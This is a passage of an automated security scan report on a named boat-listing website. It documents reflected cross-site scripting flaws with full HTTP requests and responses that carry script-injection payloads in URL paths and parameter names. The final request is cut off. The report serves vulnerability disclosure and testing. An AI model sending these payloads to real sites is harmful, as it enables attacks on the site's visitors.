Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
ow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2291213&boat_id=2291213&back=/core/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT91247"><script>alert(1)</script>c954ce2776c/United-States&boat_id=2291213">
...[SNIP]...

3.140. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	*/boats/2006/Regulator-32-Forward-Seating-low-Hours-2291213/Norwalk/CT/United-States*

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ab36"><script>alert(1)</script>22a1b43d02a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States5ab36"><script>alert(1)</script>22a1b43d02a HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:02 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 01 Dec 2010 21:04:09 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:02 GMT
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
e/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2291213&boat_id=2291213&back=/core/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States5ab36"><script>alert(1)</script>22a1b43d02a&boat_id=2291213">
...[SNIP]...

3.141. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	*/boats/2006/Regulator-32-Forward-Seating-low-Hours-2291213/Norwalk/CT/United-States*

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c65f9"><script>alert(1)</script>33ca09133af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States?c65f9"><script>alert(1)</script>33ca09133af=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:51 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 01 Dec 2010 21:04:09 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:02:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=2291213%5B%25%5D32%27+Regulator+32+Forward+Seating+*Low+Hours*%5B%25%5DUSD%26nbsp%3B114%2C995%5B%25%5DNorwalk%2C+CT%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F9%2F1%2F2%2F2291213_1_mini.jpg%3F1291236529000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-*Low-Hours*-2291213%2FNorwalk%2FCT%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2291213&c65f9"><script>alert(1)</script>33ca09133af=1&boat_id=2291213&back=/core/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States&boat_id=2291213">
...[SNIP]...

3.142. http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c38c"><script>alert(1)</script>4b6b7511d71 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point1c38c"><script>alert(1)</script>4b6b7511d71/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
